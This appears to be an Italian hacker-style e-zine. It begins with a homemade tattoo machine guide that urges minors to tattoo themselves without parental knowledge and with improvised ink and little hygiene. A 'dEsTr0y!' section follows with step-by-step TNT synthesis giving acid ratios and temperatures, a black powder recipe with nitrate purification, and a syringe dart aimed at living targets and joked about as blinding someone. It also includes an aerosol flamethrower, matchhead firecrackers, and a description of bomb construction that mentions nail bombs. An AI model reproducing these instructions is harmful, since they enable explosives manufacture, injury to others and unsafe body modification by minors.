(3) -x Pro e Contro.
(4) -x Necessario Per Costruire la Makkinetta.
(5) -x Necessario per Tatuare.
(6) -x Come si kostruisce La makkinetta per Tatuare :
- 6.o il fregnetto attakkato al perno del motorino.
- 6.1 La cannuccia.
- 6.2 Kome mettere l`ago.
(7) -x Assemblaggio.
(8) -x Se tatuiamo a casa.
(10) -x Procedura Pre-Tatu.
(11) -x Si tatua !!!

Dedico kuesto artikolo a un punk [ oi! ]...e' stato lui a farmi capire kome
funziona una di kuelle makkinette per i tatuaggi fatte in casa. Sikuramente
non mi si rikordera' perke' mi ha visto a Giugno `99 l'ultima volta.....io
sono l`uomo Pila!

Dedico anke kuesto articolo a N0bodY88 un mio caro amico che purtroppo vedo
poko poko....fatti vedere bRoT !!

Tutto komincio' in una calda mattinata...il primo Maggio per essere precisi...
scesi dal Treno,inkappati in una manifestazione dei Verdi...[mi pare],
comprata una Peroni in un bar per ricchi (4.ooo £ mortacci loro !!!) siamo
giunti in piazza kon i nostri scarponi stretti e scomodi, dopo aver preso una
scorciatoia ke si e' rivelata un giro turistico ke non aveva nulla da
invidiare ad una maratona (kuesto perke' bisogna fidarsi degli amici....).
Ecco, kui mi e' apparsa per la prima volta una makkinetta fatta in kasa per
fare i tatuaggi.

Vabbe'...dopo kuesta frasona influenzata forse da uno stile cesariano[ se si
dice kosi' ], kominciamo.

[ basta kon gli applausi ]

(1) -x Storia x-

E' una traccia indelebile che conduce ad un ostinato segreto ed e' talmente
remoto da non aver lasciato impronta nella nostra memoria.
Tuttavia l'archeologia ne ha recuperato le tracce lontane, perdute nei
millenni del passato, mediante la scoperta, avvenuta nel 1947 in Siberia, di
un corpo ibernato di un guerriero scita eccezionalmente tatuato.
Ma altri reperti rimandano a un'epoca ancora piu' antica. Infatti il
rinvenimento di alcuni utensili legati alla pratica del tatuaggio testimonia
che questa usanza era gia' esistente nel neolitico europeo. Se l'origine
rinvia sempre a qualcosa d'altro, il guerriero scita come gli utensili
neolitici indicano certamente un senso della funzione del tatuaggio.
Se l'arte di tatuare il corpo era gia' del neolitico europeo, ancora oggi
nelle regioni della Melanesia, della Polinesia e della Micronesia, la pratica
del tatuaggio e' estremamente diffusa ed esprime un notevole livello estetico
e, contemporaneamente, costituisce un forte elemento di coesione sociale.
Proprio da queste regioni lontane, precisamente dall'isola di Tahiti, la
principale tra le Isole del Vento, deriva la parola tatuaggio. Nella lingua
tahitiana "Tatu" significa "ferita" o, ancora meglio, "disegno battuto"
Questo termine che noi traduciamo "tatuaggio" e' stato introdotto in Europa
dal capitano Cook, al rientro dalla spedizione dai Mari del Sud nel luglio
1769. Si conoscono tre specie di tatuaggi:

1) Per scarificazione (incisione della pelle, diffusa nelle popolazioni dove
la pigmentazione della pelle e' fortemente scura)

2) Per cucitura (tramite un ago a cruna e un filo intriso di tintura vegetale)

3) Quest'ultima ampiamente praticata, quella per puntura (eseguita gia' nel
neolitico per mezzo di un osso o stilo appuntito, in una serie di punture
che seguono i tratti del disegno impresso sulla pelle e depositano sotto
la cute sostanze colorate).

Probabilmente il tatuaggio e' stato inventato piu' volte in luoghi e tempi
diversi. I tatuaggi primitivi, come quelli del guerriero scita, ci dicono di
immagini e disegni, linee e curve sulla pelle a trame tatuate, di arcane
potenze che attraggono e respingono, che uniscono e separano, riportandoci il
testo della norma sociale d' un tempo, l' iscrizione sul corpo di un'avvenuta
iniziazione dell' individuo alla cultura degli antenati.

Il tatuaggio primitivo svolge in prevalenza una funzione di riconoscimento e,
come la pittura corporale, assume un senso sia magico-religioso sia
ornamentale, vincolato in strutturate complessioni alla cultura che l'esprime.
La pratica del tatuaggio trova ragione d' essere nella coesione della vita
sociale del gruppo, nel "corpo sociale", e ci indica il silenzioso e remoto
desiderio dell'invisibile che si produce attraverso l'idea dell'infinito.
La scarificazione della pelle, questa eroica ferita cesellata sul corpo di cui
traccia i limiti e, altresi', il corpo iscritto nel tatuaggio, sono da
intendersi quale inevitabile istanza di separazione dall'Altro, di mistero
dell'Altro, ma pur sempre indizio, traccia che rivela la necessita' di
strappare ritualmente e definitivamente il corpo dalla totalita' originaria
della natura, della nascita e della morte. Il segno a valenza sociale del
tatuaggio primitivo, cosi' indelebilmente impresso sul corpo, e' spesso
accompagnato nei riti di iniziazione all'assegnazione di un nuovo nome,
certificando in tal modo la nuova identita'e il nuovo status dell' individuo.

Mistica senza divino, il tatuaggio modifica pelle come elemento in cui natura
e cultura si confondono, similitudine e metafora s'intersecano: la pelle
diventa cosi' tessuto somigliante nelle trame tatuate sempre piu' ad un abito,
disvelando e ricoprendo ad un tempo la nudita'.

emh....si kui il tono e' kambiato.....non sono stato io a scrivere il
paragrafo della storia del Tatu....ce l`ho messo perche' mi sembrava
interessante capire da dove e' spuntato fuori il Tatu.

Non rikordo il sito da dove ho preso la storia del tatoo..ce ne sono talmente
tanti in rete....

La storia invece della makkinetta e' molto + recente....non so ki se la sia
inventata...ma e' molto in uso fra noi punx...oi oi oi s.P.q.R. pUnX!

(2) -x Legge Kontro il Tatoo Oggi x-

I tatuaggi oggi sono vietati ai minori di 18, anke se i tatuatori non staranno
a kiederevi kuanti anni avete....kuindi se siete minorenni la makkinetta per
i tatuaggi e' un modo per non pagare nulla e non kiedere nulla ai vostri
genitori...vabbe'...accennategli kualkosa.....entrare in kasa kon un tatoo
senza ke i genitori lo sanno non e' una buona kosa.

(3) -x Pro e Contro x-

Non ci sono ne pro e e contro...vabbe' usate un minimo di pulizia.....non vi
fate i tatoo dentro un cesso pubblico....l'uniko Pro della makkinetta oltre
al kosto zero e' ke vi potete fare tatuaggi kuando volete...per strada, a casa
dell'amica, etc etc...
Ah....per i + lesi....la makkinetta e' portatile!

(4) -x Necessario Per Costruire la Makkinetta x-

Per kostruire la makkinetta e' necessario avere :

- Un motorino...tipo kuello del walkman rotto va benissimo...se ne trovate altri + veloci sono ankora meglio.
- Fili elettrici.
- Saldatore ( non estremamente necessario ).
- Attash...vabbe' si non so kome si scrive...sarebbero le grappette, kuelle
per tenere uniti i fogli.
- Un cucchiaino leggero e non pesante....kmq sia non molto robusto.
- Penna vecchia tipo Bic kompresa la kannuccia.
- Ago fino fino.
- Ago o asta di ferro fina ma + grande dell`ago fino.
- Nastro Adesivo ( possibilmente verde...grEEn poWer..hehe :) ).
- Colla al cianuro tipo Attack[ate a 'sto cazzo!].
- Batterie, kualsiasi tipo ke faccia girare il motorino velocemente [ se
volete soffrire di meno ] o kuando vi trovate a casa Trasformatore
regolabile.

--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--

(5) -x Necessario per Tatuare x-

- Inkiostro nero Rotring..la stessa marca ke fa le gomme da cancellare..
komprate solo il Rotring poiche' viene assorbito bene dalla pelle.
- Tappo tipo Ackua Ferrarelle [ ke mi fa cagare assai ] oppure tappo di
metallo delle bottiglie di birra.
- Ackua
- Sapone
- Carta Igienika
- Rasoio
- Schiuma da Barba
- Pennarello kolor verde chiaro ( gReEn rUleZ !!! )

--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--

(6) -x Necessario dopo aver tatuato x-

- Vasellina ( non so se si scrive kon 2 elle o kon una sola... )

--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--x--

x-x-x Come si kostruisce La makkinetta per Tatuare x-x-x

Kuesto e' una specie di disegno in Ascii , e' la makkinetta per tatuare vista
frontalmente sul lato destro.



| __________________
6.1 ----> ====|======_____|______|_____\=- <---- 6.2
6.o --> __|__ /
| | |
| | |
\ |_____| /
\_______/

Dai su....con molta immaginazione e' kosi'!

-x 6.o il fregnetto attakkato al perno del motorino. x-

Vista frontale lato destro



||
|| <------ Asticina di ferro.
||
||
||
||
_ ||
|#||| <---- Inkollare `sti due kon della kolla.
Perno del motorino. |#||| Poi metterci del nastro adesivo.
|#|||
|#|||
|#|||
###################################
#############motorino##############
###################################
###################################
###################################

Innanzi tutto kuesta e' la parte + difficile...ma niente paura..basta
procedere kon kautela.

Attakkate kon della kolla Attack l`asticina di ferro sul perno del motorino
[ kuello ke gira ].

Evvai....kui ci siamo.....prima di mettere il nastro adesivo kontrollate ke
il motorino giri bene senza problemi, e ke l'asticina descivi un modo
perfettamente [ o kuasi ] circolare.

Se gira male, lanciate kualke infamia e rikominciate , poi cmq rikordatevi di
mettere del nastro adesivo attorno.

Ora saldate o attakkate semplicemente i fili al motorino [ ah..konsiglio di
rimmediare dei fili non eccessivamente duri, ma piuttosto morbidi.
Fatto kuesto passiamo avanti.

-x 6.1 La cannuccia. x-

Vista frontale lato destro



_______
|#####|
Asticina di ferro. -----> |#####|
___________________________|#####|____________________________________
| |#####|
|///////////////////////////|#####|////////////////////////////////////
| Cannuccia svuotata |#####| dell`inkiostro contenuto.
|///////////////////////////|#####|////////////////////////////////////
|___________________________|#####|____________________________________
|#####|
|#####|
|#####|
|#####|




Ora svuotate tutta la cannuccia dall'inkiostro residuo e fate un taglio nella
cannuccia da una e dall'altra parte per infilarci l'asticina dentro.
Fate un taglio preciso perche' se vi sbagliate dovete buttare la cannuccia.

Occhei, passiamo al 6.2.

-x 6.2 Kome mettere l`ago. x-

Vista frontale lato destro

____________________________
| |
/////////////|//////////////| <------ Cannuccia della penna.
| |
/////////////|//////////////|
_____________|______________|
====|==============|=========- <---- Ago kon punta fina,
attakkato alla cannuccia
kon del nastro adesivo.



Hey boiz...occhei...questa e' la penultima parte da kostruire...la cannuccia
kon l`ago.Prendete la cannuccia e metteci l'ago, legando il tutto kon del
nastro adesivo.E`importante ke l'ago possa essere regolato (cioe' essere
tirato un po' fuori o un po' dentro) secondo le vostre necessità.Insomma...
kol tempo imparerete e vi regolerete da soli.

(7) -x Assemblaggio x-

Kuesto e' molto facile...allora. Prendete il cucchiaino e piegatelo dandogli
una forma simile a kuesta ( non vi lamentate per il disegno !!! :\ ):


________________
/
|
|
\ #carta# /
\________/

Occhei...dicevamo ?!?...ah si`...ora nella " cavita' " del cukkiaino metteteci
un pezzettino piegato di carta igienika ( per evitare i contatti tra motorino
e metallo del cucchiaio ), poi metteteci il motorino kon i fili ke avrete
saldato al motorino o semplicemente unito e legate bene con del nastro adesivo.

Ecco stiamo kuasi per finire :), ora applicate con del nastro adesivo la cosa
trasparente della penna Bic sulla parte dritta del cucchiaino.
Ficcateci dentro la cannuccia della Bic senza l`affare dorato ke sta in punta.

Ora calmi!...fate passare l`asticina di ferro dentro la cannuccia attraverso
i tagli ke avete fatto. L'asticina deve stare ben stretta dentro i tagli della
cannuccia.. poiche' potrete regolare in kuesto punto la presa d'inkiostro da
parte dell`ago.
Pare ke ce l'abbiamo fatta.Per kuelli + sfigati:

Partita Finita...la preghiamo di lanciare 2 bestemmioni e
rinkominciare da capo. Sarete + sFortunati. :/ ???

(8) -x Se tatuiamo a casa x-

Se tatuate a casa non conviene usare batterie, kuindi attakkate il
trasformatore al motorino, in genere un motorino non supera i 3 volts kuindi
state attenti ( ...basta leggere sotto il motorino ).

(9) -x Se tatuiamo per strada x-

Se tatuerete per strada konviene portarvi delle batterie *cariche* ;).
Attakkate le grappette ( le attash ) ai fili kollegati al motorino e uniteli
alla 9 volts o alla 4.5 volts.

(10) -x Procedura Pre-Tatu x-

Se siete uomini converra' tagliare tutti i peli nella parte dove volete
tatuare kon un po' di skiuma da barba e rasoio....ora ke ci penso ho visto
anke delle donne virili kon le basette...ummh....orake ci penso...anke se
siete donne radete prima ke e' meglio :) .

(11) -x Si tatua !!! x-

Ekko ora la parte + emozionante...dipingerete un corpo...e lo modifikerete
a vostro piacere... w0w !!!
Riempite una bottiglia d'ackua e metteteci del sapone dentro, kuesta servira'
per pulire le sbavature ke farete.

Riempite il tappo di inkiostro e preparate la makkinetta....ci siamo kuasi...
dopo aver deciso kosa tatuarvi fatevi un disegno kon il pennarello verde dove
vi vorrete tatuare ( ovviamente :) ).

Ora state calmi voi e kuello a cui fate il tatuaggio perke' ogni pikkolo
movimento o kontrazione e' un`errore irrimediabile.

Dopo aver fatto il tatuaggio la pelle si screpolera' un poko....niente paura
applicate della vaselina regolarmente!

Prima di fare il tatuaggio pensate ke e' una kosa ke vi rimarra' tutta la vita
kuindi non fate cazzate..intesi ?!?

Alla prossima people..oi! saluto anke elsa, mich e Yoghi

CiaoCiao

---dR`sP3nKy----


########################

  
##############
#+----------++----------++----------+#
#| dEsTr0y! || dEsTr0y! || dEsTr0y! |#
#+----------++----------++----------+#
######################################


-DisClaImeR PeR la SeZiOne "DeStR0y!"-

TuTTe le informazioni contenute in questa sezione sono state pubblicate SOLO
ed ESCLUSIVAMENTE con lo scopo di DIVERTIRE il lettore (e anke per far tacere
la smania distruttiva di alcuni di noi! ;-)). Non si vuole in nessun modo
invitare la gente a compiere azioni pericolose per la propria incolumita' e
quella di eventuali "vittime", o terze persone. Pertanto non ci riterremmo
responsabili di qualunque azione effettuata dopo la lettura di queste
informazioni.

Il possesso e la lettura di suddette informazioni e' comunque LECITO

----> NON FATE CAZZATE PLZ!<-------


-=!!!|-sTimA dElLe dIsTaNzE-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

In questo articolo trattero' un semplice metodo
di calcolo delle distanze, usato nella grande guerra,
spero possa tornare utile a qualcuno.

Per stimare la distanza 'a vista' con riferimento la
figura di un uomo in piedi occorre tener presente che:

-fino a 200 metri, tutte le parti del corpo si
distinguono nettamente;
-a 300 metri, i contorni del viso si dissolvono in una
macchia;
-a 400 metri, si distingue il contorno del corpo, il
viso non e' visibile (se non in circostanze
particolarmente favorevoli);
-a 500 metri, il corpo sembra affinarsi leggermente, a
partire dalle spalle. I movimenti delle estremita' sono
ancora percettibili;
-a 600 metri, la testa diventa un punto e i particolari non
piu' percettibili;
-oltre 600 metri, difficilmente si riesce a riconoscere
la figura dell'uomo, in quanto irrilevabile ad occhio nudo.

Consiglio comunque a tutti di munirsi di un opportuno strumento
ottico che permetta di ingrandire notevolmente i particolari
piu' lontani: i binocoli e altri sistemi ottici li trattero'
presto in altri miei articoli.

---cYb0rG--- [dGt_BRaInS]



-=!!!|-SyRyNGe gUn-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

Premetto che cio' di cui trattero in seguito ha ben poca utilita': e' qualcosa
tanto pazzo quanto inutile (almeno cosi' credo)

Vi occorrono:
1 Siringa con l'ago
1 Candela (va bene anche se e' mezza consumata)
1 Fiammifero/accendino (insomma qualcosa per accendere)

!
------==HHH||||||||||||||||;;;;;;;;;;|
/ / ! /
ago parte A parte B

1)Accendete una candela e fate fondere un po' di cera

2)Prendete una siringa, inseritevi l'ago, e aspirate la cera finche' e'
liquida (ovviamente la cera si asciughera' dentro il condotto dell'ago
otturando il foro)

3)Assicuratevi che il condotto dell'ago sia completamente ostruito facendo una
leggerissima pressione alla 'parte B'(vedi schema sotto): se l'aria che e'
contenuta dentro la siringa non esce e, dopo la vostra pressione la 'parte
B' ritorna alla posizione originale, vuol dire che avete fatto bene, se
al contrario avete sbagliato qualcosa, tornate al punto 2

4)Tirate completamente fuori la 'parte B' fino a dividere la siringa in due
pezzi:

!
------==HHH|||||||||||||||| PARTE A
!


<;;;;;;;;;;;;;| PARTE B


5)Reinserite leggermente le 'parte B' nella 'parte A'

6)Puntate un bersaglio, meglio se vivente (lo si trova facilmente, come
scrisse qualcuno ;)

7)Fate forza sulla 'parte B' fino a permettere all'aria intrappolata
nella siringa di fare pressione sull'ago e di farlo saltare via:
complimenti, avete appena accecato qualcuno ;))))

---Cyborg--- [dGt_BRaInS]


-=!!!|-TNT Tut0rIal-|!!!=-

Traduzione di: M4l3f1K0

Probabilmente il piu' importante esplosivo usato al giorno d'oggi
e' il TNT (trinitrotoluene). Questo e molti altri simili tipi di potenti
esplosivi sono usati dall'esercito, per il loro fantastico potere,
circa 1000 tonnellate per 2,5 cm quadrati , ed e' anke molto stabile.
Il TNT ha anche il grande vantaggio di essere capace di likuefarsi
alla temperatura di 82 gradi F., per kuesto puo' essere versato in cartucce,
mortai, o kualsiasi altro proiettile.
Il TNT dell'esercito è contenuto in contenitori come kuelli delle pile e
solitamente vengono innescate da una scarica elettrica
accoppiata ad una protezione, ma ci sono anke altri metodi.


Preparazione del TNT

1. Prendi due recipienti. Nel primo prepara una soluzione con 76
per cento di acido solforico, 23 per cento di acido nitrico
e di 1 per cento di acqua. Nell' altra coppa, prepara
un' altra soluzione di 57 per cento di acido nitrico
e di 43 per cento di acido solforico (le percentuali sono
indicano il rapporto).

2. 10 grammi della prima soluzione vanno fusi in un recipiente vuoto
e messi nel congelatore.

3. Aggiungi 10 grammi di toluene, e mescola per diversi minuti.

4. Rimuovi il contenitore dal contenitore e scaldalo gentilmente
fino a raggiungere i 50 gradi C. Bisogna mescolare costantemente
la soluzione mentre la si riscalda.

5. Aggiungi 15 grammi addizionali dell'acido, dal primo contenitore,
mantieni la temperatura per i prossimi 10 minuti, e
un liquido oleoso incomincera' a formarsi in cima all'acido.

6. Dopo 10 o 12 minuti, la soluzione deve ritornare al congelatore,
e raffreddata a 45 gradi C. Kuando reagisce kuesta temperaura,
il likuido oleoso scenderà e si accumulera' sul fondo
del recipiente. A kuesto punto, la soluzione dell'acido rimanente
dovrebbe essere estratta, usando una siringa.

7. Aggiungi 50 gr in piu' della prima soluzione al liquido oleoso
mentre la temperatura viene alzata LENTAMENTE a 83 gradi C..
Dopo che la temperatura ha reagito, mantienila per un'intera mezz'ora.

8. Alla fine di kuesto periodo, raffredda la soluzione fino ai 60
gradi C, e mantienila a kuesta temperatura per un'altra buona
mezz'ora. Dopodiché, l'acido dovrebbe essere estratto, lasciando
solo un po' del liquido oleoso.

9. Aggiungi 30 grammi di acido solforiko, mentre riscaldi gentilmente
il likuido oleoso a 80 gradi C. Tutti gli aumenti di temperatura
devono essere compiuti lentamente e gentilmente.

10. Una volta raggiunta la temperatura desiderata, aggiundi 30 grammi
della seconda soluzione d'acido, e aumenta la temperatura da 80
gradi C a 104 gradi C., e mantienila per mezz'ora.

11. Dopo kuesto periodo di tre ore, abbassa la temp. della miscela a 100
gradi C. e mantienila per mezz'ora.

12. Dopo kuesta mezz'ora, rimuovi l'olio dall'acido e lavalo
con acqua bollente.

13. Dopo il lavaggio con acqua bollente, mentre lo mescoli costantemente,
il TNT comincera' a solidificare.

14. Kuando e' partita la solidificazione, aggiungi dell'acqua fredda
al recipiente, così ke il TNT formera' delle pallottole. Una volta
fatto, avrai ottenuto una buona kualita' di TNT.

NOTA: Le temperature usate per la preparazione del TNT sono ESATTE, e
devono essere usate come tali. NON stimare o fare approssimazioni.
Compra un buon termometro a Gradi Centigradi.


---(m4l3F1K0)--- [dGt_BRaInS]


-=!!!|-LANCIAFIAMME-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

_ .'::'###########
/_:_''::;::!############
|@@@@| '.:!!###########
|@@@@| _*%
|@@@@| | |
|____| |_|

Ecco come mettere in piedi un semplice lancia fiamme.

Hai bisogno di:

-Una bomboletta spray di deodorante
-Un accendino a gas

Procedimento:

Prendete una bomboletta spray [piena] di deodorante
[una bomboletta di quelle col gas] e tenetela nella
mano destra, nella mano sinistra tenete un accendino
[con fiamma ad altezza quasi max.]. Accendete l'accendino
e puntate col getto della bomboletta la fiamma dell'accendino
[occhio ai vestiti!]. Ecco il vostro lancia fiamme ;).
A seconda della pressione del gas della bomboletta potete arrivare
a fare delle fiammate lunghe quasi un metro.

---Cyborg--- [dGt_BRaInS]



-=!!!|-SeMplIcI 'fUm0gEni' E 'pEtARDi'-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

Ecco uno dei miei soliti articoli assurdi, questa volta vi spieghero' come
sfruttare a pieno dei semplici cerini.

Materiale occorrente:
-Cerini con testa blu
-Accendino

Il procedimento e' semplicissimo, basta aprire la bacchettina bianca del
cerino e piegarlo come nelle figure seguenti:

1. 0
I
I
I
^

2. 0
I
.I.
III
^^^

3. 0
.I.
III
IIIII
^^^^^

4. .0.
III
IIIII
^^^^^

5. .III.
III°III
^^^^^^^

6a. ,.,
.;°;. >Fumogeno<
;III;
^^^^^

6b.
,III,
.I°I. >Petardo<
'III'

+-----------------------------------------------+
.,:;I' = Cera
0 = Testa del cerino visivile esternamente
° = Testa del cerino coperta dalla cera
+-----------------------------------------------+

Ricordate che non dovrete staccare la testa del cerino e che la dovete
mantenere sempre all'interno della cera
(in modo da non vederla piu' quando avrete finito il tutto).
Adesso potete optare se dare vita a un piccolo, semplice e innoquo 'fumogeno'
(con 3/4 di essi si riesce a riempire una piccola stanza) o un altrettanto
piccolo 'petardo' (il 'botto' sara' piccolissimo, circa quanto quello di una
cipollina), il tutto sta in come piegherete il sottilissimo strato cera a
partire dal punto 5:

}PETARDO{
Se la cera sara' disposta in maniera equa tra i vari lati
otterrete un 'petardo' Per accenderlo dovrete poggiare
la fiamma dell'accendino su un lato qualsiasi, quando la
cera si accendera' riscaldera' lo zolfo della testa e lo
fara' saltare provocando un piccolissimo botto;

}FUMOGENO{
Se lascierete la testa del cerino vicina allo strato piu'
sottile di cera e, ammasserete la cera tutta da una parte
otterete 'un fumogeno'. Per accenderlo dovrete indirizzare
la fiamma dell'accendino verso il lato con meno cera, in modo
che il sottile strato di cera bruci subito e accenda la testa
di zolfo che bruciando consumera' la cera che spegnendosi
fumera'.

Non credo servano a molto ma, li trovo interessanti in quanto sono
estremamente facili da realizzare (direi istantanei) e, in qualche modo
potrebbero tornare utili.

---cYb0rG--- [dGt_BRaInS]


-=!!!|-Xar'S gUnP0wDeR-|!!!=-

Autore: XaRaBaS

*** XaRaBaS proletarians productions presents.... ***

________________________________________________________
| |
| |
| ---> XaR's GuNpOwDeR <--- |
| |
--------------------------------------------------------


N.B. il sottoscritto XaRaBaS, non si ritiene responsabile per qualsiasi
uso improprio di questa guida, ammetto di averla scritta solo x scopo
informativo, e x questo deve continuare a vivere, altrimenti, se non sei
d'accordo con me, cancella subito sto file! :)


--( Cenni Storici )--

Cos'è la polvere da sparo? Beh, sinceramente è stata scoperta in una
circostanza singolare..

Pensate che dei frati volevano scoprire l'elisir dell'eterna giovinezza, e ma
hanno skoperto quello dell'eterna bomba ... ;)
Con la sua scoperta il mondo della guerra è stato rivoluzionato
ponendo molto spesso un dubbio: si ci chiedeva infatti circa nel 1500 se fosse
qualkosa di ignobile adoperarla nelle battaglie o nelle guerre..

io penso solo che sia utile saperla fabbricare, per il resto sinceramente me
ne fotto... ;) Beh spero che questa guida vi piaccia, godetevela!


--( Ingradienti )--

Sinceramente ritengo che la polvere nera, also called "polvere da sparo", sia
l'esplosivo più economico da produre e anche il più semplice, dal punto di
vista pratico.... Beh, ecco qui la lista degli ingradienti:

- Nitrato di Potassio ( è un fertilizzante, lo vendono in confezioni di 50
kili, xciò munitevi di macchina! ;)
£ 42.000

- Carbone ( qualsiasi tipo di carbone, sia carbonella, che comprato, basta che
non sia carbone "coke" )


- e BaSTA! che cosa vi aspettavate? Vi ho detto che è estremamente economico!
:)


--( COme FaRe? )--

Allora, prima di tutto dovete essere sicuri della purezza del nitrato di
potassio: fate una prova prima, adesso, cosa dovete fare:

Dovete polverizzare il carbone che avete procurato, ma polverizzare nel vero
senso della parola ;)

Una volta fatto questo, cioè dopo aver ridotto in polvere una media quantità
di carbone, non dovete fare altro che miscelare il nitrato di potassio e il
carbone in queste dosi:

- 1 dose di Carbone
- 2 dosi di KnO3 (Nitrato di Potassio, l'ho chiamato x formula)

Può kapitare che il nitrato di potassio che vi vendono sia in granuli...
nessun problema! ;)

Polverizzate pure quello! Ma può anche capitare di peggio... come quello che
sto per dirvi ora..
Beh, ora avete ottenuto la polvere da sparo, anche se questo è ancora da
vedere :), dunque è necessario fare una prova..

Prendete un po di polvere, ma POCA mi raccomando, altrimenti si produrrà
un fumo pazzesko ;), e buttategli sopra un cerino acceso: se prende fuoco in
modo istantaneo, allora il nitrato era puro abbastanza, e la vostra polvere
da sparo è ottima, mentre se x prendere ha bisogno che ci teniate su il
cerino... beh Buttatela nel cesso!

Voi vi chiederete, "KE KAZZO E' SUCCESSO??" beh, risposta semplice: il nitrato
di potassio non era abbastanza puro, di konseguenza, è venuta una "cagata da
sparo"
;)

Allora starà balenando nella vostra mente il pensiero :" KAZZO! Ora kon 48
kili di KnO3 sul groppone ke KAZOO CI FACCIO!!????"
, ma è proprio qui che vi
sbagliate, ebbene, toccherà a noi purificare il nitrato di potassio.
Vi Spiego subito come, sono necessari:

- 1 pentolino capiente
- 1 Bottiglia d'acqua
- Nitrato di Potassio (Ma va?)

Bene, procediamo: Prendete una bottiglia piena d'acqua, preferibilmente di
plastica, anche xchè dopo dovrà essere gettata :), e scioglieteci dentro il
nitrato di potassio fino a quando non se ne scioglie +, e ve accorgerete
presto, una volta che si sarà tutto saturato, mettete il contenuto della
bottiglia nel pentolino, e fate bollire tutto: bollendo, l'acqua evapora,
portando con se anche le impurità così sul fondo del pentolino rimarranno
solo i cristalli di KnO3, e così avrete ottenuto il Nitrato di potassio
PURISSIMO!

Adesso non rimane altro che ripetere il procedimento di miscelatura e il
gioco è fattO!
MI raccomando, prudenza boys! Spero che quanto ho scritto vi sia di aiuto.
Alla Prossima Guida! BYE :)


GrEEtS FrOm X-a-R-a-B-a-S


X ogni comunicazione, la mia e-mail è aperta a tutti:

xarabas@yahoo.com


Inf0:
www.xarabas.com e' down, xcio' appena avro' un'altra home lo comunichero'.

---X-a-R-a-B-a-S---



-=!!!|-aRchitEttUrA dEgli 0rDigNi eSpL0sIvi-|!!!=-

Autore: cYb0rG [dGt_BRaInS]

Un ordigno esplosivo e' costituito normalmente da:
-esplosivo;
-innesco;
-accenditore;
-involucro contenitore.

}ESPLOSIVO{

L'esplosivo e' una sostanza la cui prerogativa e' la
capacita' di trasformarsi istantaneamente in un grande
volume di gas ad elevatissima temperatura che si espande
a pressione nell'ambiente circostante, quindi in grado
di generare un enorme calore e pressione che si traduce
in grande forza d'urto con effetti distruttivi. Tale
sostanza si trasforma a seguito di sollecitazioni
esterne: per urto, sfregamento o calore, sviluppando
elevata energia termica, effetti luminosi, gas ed energia
meccanica. L'espansione dei gas e' detta esplosione, ed
e' sempre accompagnata da un boato, o detonazione. I gas
espansi ad elevata temperatura creano un'onda diretta o
di pressione e, per la loro temperatura, si innalzano e
svaniscono nell'atmosfera. L'aria respinta e compressa
dall'onda diretta torna istantaneamente e con violenza a
riempire il vuoto prodottosi, dando luogo ad un'onda
retrograda, i cui effetti si sommano a quelli prodotti
dall'onda diretta. L'onda diretta che incontra un oggetto
produce delle lesioni che possono poi venir aggravate
dall'onda retrograda; ad esempio un muro può essere
lesionato dall'onda diretta e poi fatto cadere dall'onda
retrograda. E' per tale fenomeno che gli effetti di una bomba
possono apparire diversi da quelli dettati dalla comune esperienza;
ad esempio l'esplosione di una bomba in una strada può far
ritrovare le saracinesche dei negozi e le vetrine sventrate
verso l'esterno, le pareti crollate verso la strada ed il
tetto scoperchiato verso l'alto. L'onda retrograda creata
dall'aria che ritorna violentemente verso il centro
dell'esplosione può dar luogo a una successiva onda
rimbalzante all'indietro, ma di non rilevante potenzialità.
Quando l'esplosione avviene nel terreno, si creano in esso
delle vibrazioni con onde d'urto simili a quelle di un
terremoto, che possono cagionare lesioni agli edifici o che
possono avere l'effetto di una mazzata su di una persona a
contatto con la superficie investita (una bomba che scoppia
sotto una nave può provocare lesioni a coloro che si trovano
sulla sua tolda per il solo effetto dell'urto). E' per questo
motivo che chi si trova a breve distanza da un'esplosione deve
stendersi a terra avendo però l'avvertenza di reggersi solo
sulle punte dei piedi ed i gomiti: in tal modo evita lo
spostamento d'aria, l'ondata di calore e l'onda d'urto
trasmessa dal terreno.


,
-+-
|
/ \
|^^^|
| O |________
| | |
| | _ _ |
| | | | |_||
|___|_|_|____|

--------------
prima
--------------
,
-+-
\
/ ,
|^^^|
| O :________
| | |
: ; _ _ .
| | | < |_:|
|___|_|_|____,
. : . °.
---------------
dopo <<------
onda diretta <<------
--------------


_
%,
t^''l
>0 ;_-_ __
j i ^ ° :
: ; _ . .
I ; ; < ;-:<
>_ _i_l#:_ __,
°.:,°°.,'.-;.'
-----------------
dopo ------->>>
onda retrograda ------->>>
-----------------

A breve distanza, l'esplosione agisce direttamente con
onde d'urto pulsanti che attraversano l'oggetto e vengono
riflesse dalle sue superfici libere così che si creano
in esso sovratensioni che ne provocano la rottura.
All'esplosione segue normalmente una fiammata con possibile
proiezione di corpi incandescenti che possono provocare
incendi nonché una irradiazione di calore che può essere la
causa di ustioni da irradiazioni e di possibili incendi
Nel caso di esplosivo caricato in contenitori metallici
(mine, bombe, proiettili, ordigni esplosive), o di bombe
chiodate (create legando grossi chiodi attorno ad un
nucleo di esplosivo), vi è l'ulteriore effetto della proiezione
di frammenti metallici di varie dimensioni (schegge).
Frammenti minuti ma aventi elevata velocità possono cagionare
lesioni più ampie di quelle prevedibili. Le persone coinvolte
da un'esplosione sono sottoposte ad entrambi gli effetti della
medesima. La potenza di un esplosivo ed i suoi effetti
dipendono da vari fattori, quali la velocità ed il calore
di esplosione, la quantità di gas prodotti, influenzata dalla
temperatura di esplosione, e le conseguenti pressioni realizzabili.
Esplosivi ad alta velocità di detonazione hanno maggori
effetti distruttivi anche per semplice contatto, potendo
tranciare di netto piastre e sbarre metalliche; esplosivi
che producono molto gas sono più idonei in campo civile in
cui occorre sfruttare l'effetto di distacco. La prova più usata
per determinare la potenza di un esplosivo consiste nel farlo
esplodere entro un grosso blocco di biombo (blocco di Trauzl)
e nel misurare poi il volume della cavità creatasi. In base
ad essa, se si assume che la gelatina esplosiva abbia il
valore eguale a 100, si ha la seguente scala di valore per
gli altri esplosivi:

Gelatina esplosiva, 100
T4, 90
Pentrite, 80
Tritolo, 50
Fulminato di mercurio, 20
Polvere nera, 7


}INNESCO{

